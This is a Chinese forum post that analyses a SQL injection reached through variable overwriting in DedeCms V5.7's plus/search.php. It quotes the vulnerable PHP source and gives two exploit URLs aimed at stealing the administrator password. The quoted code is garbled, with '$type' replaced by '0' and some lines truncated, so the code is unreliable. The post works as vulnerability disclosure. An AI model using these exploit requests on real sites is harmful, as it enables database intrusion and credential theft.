DedeCms V57 plus/search.php文件SQL注射
微博上看到就分析了一下,这个漏洞不止一处地方可以被利用.其实可以无视magic_quotes_gpc = On的时候.真心不鸡肋.作者: c4rp3nt3r@0x50sec.org
Dedecms最新版 plus/search.php 文件存在变量覆盖漏洞,成功利用该漏洞可以获取管理员密码.
黑哥说漏洞已补.怪我没有测试好.也没用这个黑站…不过这个漏洞真心不错,应该有一定利用价值.标题就不改了,补了就公开了吧.
============
Dedecms最新版 plus/search.php 文件存在变量覆盖漏洞,成功利用该漏洞可以获取管理员密码.
[*] require_once(dirname(__FILE__).”/../include/common.inc.php”);
[*] require_once(DEDEINC.”/arc.searchview.class.php”);
[*]
[*] $pagesize = (isset($pagesize) && is_numeric($pagesize)) ? $pagesize : 10;
[*] 0id = (isset(0id) && is_numeric(0id)) ? 0id : 0;
[*] $channeltype = (isset($channeltype) && is_numeric($channeltype)) ? $channeltype : 0;
[*] $kwtype = (isset($kwtype) && is_numeric($kwtype)) ? $kwtype : 1;
[*] $mid = (isset($mid) && is_numeric($mid)) ? $mid : 0;
[*]
[*] if(!isset($orderby)) $orderby=”;
[*] else $orderby = preg_replace(“#[^a-z]#i”, ”, $orderby);
[*]
[*]
[*] if(!isset($searchtype)) $searchtype = ‘titlekeyword’;
[*] else $searchtype = preg_replace(“#[^a-z]#i”, ”, $searchtype);
[*]
[*] if(!isset($keyword)){
[*] if(!isset($q)) $q = ”;
[*] $keyword=$q;
[*] }
[*]
[*] $oldkeyword = $keyword = FilterSearch(stripslashes($keyword));
[*]
[*] //查找栏目信息
[*] if(empty(0id))
[*] {
[*] 0nameCacheFile = DEDEDATA.’/cache/typename.inc’;
[*] if(!file_exists(0nameCacheFile) || filemtime(0nameCacheFile) < time()-(3600*24) )
[*] {
[*] $fp = fopen(DEDEDATA.’/cache/typename.inc’, ‘w’);
[*] fwrite($fp, “SetQuery(“Select>
[*] $dsql->Execute();
[*] while($row = $dsql->GetArray())
[*] {
[*] fwrite($fp, “\0Arr[{$row['id']}] = ‘{$row['typename']}’;\r\n”);
[*] }
[*] fwrite($fp, ‘?’.'>’);
[*] fclose($fp);
[*] }
[*] //引入栏目缓存并看关键字是否有相关栏目内容
[*] require_once(0nameCacheFile);
[*] //0Arr这个数组是包含生成的临时文件 里面定义的,由于dedecms的全局变量机制,我们可以自己定义一个
[*] //
[*] if(isset(0Arr) && is_array(0Arr))
[*] {
[*] foreach(0Arr as $id=>0name)
[*] {
[*]
[*] $keywordn = str_replace(0name, ‘ ‘, $keyword);//这个地方要绕过
[*] if($keyword != $keywordn)
[*] {
[*] $keyword = $keywordn;
[*] 0id = $id; // 这里存在变量覆盖漏洞使 0id = (isset(0id) && is_numeric(0id)) ? 0id : 0; 这句过滤成了摆设
[*] break;
[*] }
[*] }
[*] }
[*] }
然后plus/search.php文件下面定义了一个 Search类的对象 .
在arc.searchview.class.php 文件的SearchView类的构造函数 声明了一个TypeLink类.
$this->TypeLink = new TypeLink(0id);
TypeLink类的构造函数没有经过过滤,(程序员以为前面已经过滤过了… )直接带入了sql语句.
[*] class TypeLink
[*] {
[*] var 0Dir;
[*] var $dsql;
[*] var $TypeID;
[*] var $baseDir;
[*] var $modDir;
[*] var $indexUrl;
[*] var $indexName;
[*] var $TypeInfos;
[*] var $SplitSymbol;
[*] var $valuePosition;
[*] var $valuePositionName;
[*] var $OptionArrayList;
[*]
[*] //构造函数///////
[*] //php5构造函数
[*] function __construct(0id)
[*] {
[*] $this->indexUrl = $GLOBALS['cfg_basehost'].$GLOBALS['cfg_indexurl'];
[*] $this->indexName = $GLOBALS['cfg_indexname'];
[*] $this->baseDir = $GLOBALS['cfg_basedir'];
[*] $this->modDir = $GLOBALS['cfg_templets_dir'];
[*] $this->SplitSymbol = $GLOBALS['cfg_list_symbol'];
[*] $this->dsql = $GLOBALS['dsql'];
[*] $this->TypeID = 0id;
[*] $this->valuePosition = ”;
[*] $this->valuePositionName = ”;
[*] $this->typeDir = ”;
[*] $this->OptionArrayList = ”;
[*]
[*] //载入类目信息
[*]
[*] $query = “SELECT tp.*,ch.typename as
[*] ctypename,ch.addtable,ch.issystem FROM `#@__arctype` tp left join
[*] `#@__channeltype` ch
[*] on ch.id=tp.channeltypeWHERE tp.id=’0id’ “; //注射漏洞发生在这里,很明显需要magic_quotes_gpc = Off 鸡肋了吗?好可以吧至少不需要会员中心阿
[*]
[*] if(0id > 0)
[*] {
[*] $this->TypeInfos = $this->dsql->GetOne($query);
利用代码一 需要 即使magic_quotes_gpc = Off
http:// /plus/search.php?typeArr=c4&kwtype=0&q=c4rp3nt3r&searchtype=title
这只是其中一个利用代码… Search 类的构造函数再往下
[*] ……省略
[*] $this->TypeID = 0id;
[*] ……省略
[*] if($this->TypeID==”0″){
[*] $this->ChannelTypeid=1;
[*] }else{
[*]
$row =$this->dsql->GetOne(“SELECT channeltype FROM `#@__arctype` WHERE>
[*] //现在不鸡肋了吧亲…
[*] $this->ChannelTypeid=$row['channeltype'];
[*]
[*] }
利用代码二,下面这个EXP 即使magic_quotes_gpc = On 也可以成功利用.
http:// /plus/search.php?typeArr=11&&kwtype=0&q=1111&searchtype=title
如果那个数据库里存在内容,就要考虑的复杂点了.我也没考虑那么周全,分析了下然后简单测试了下,也没用来黑站
页:
[1]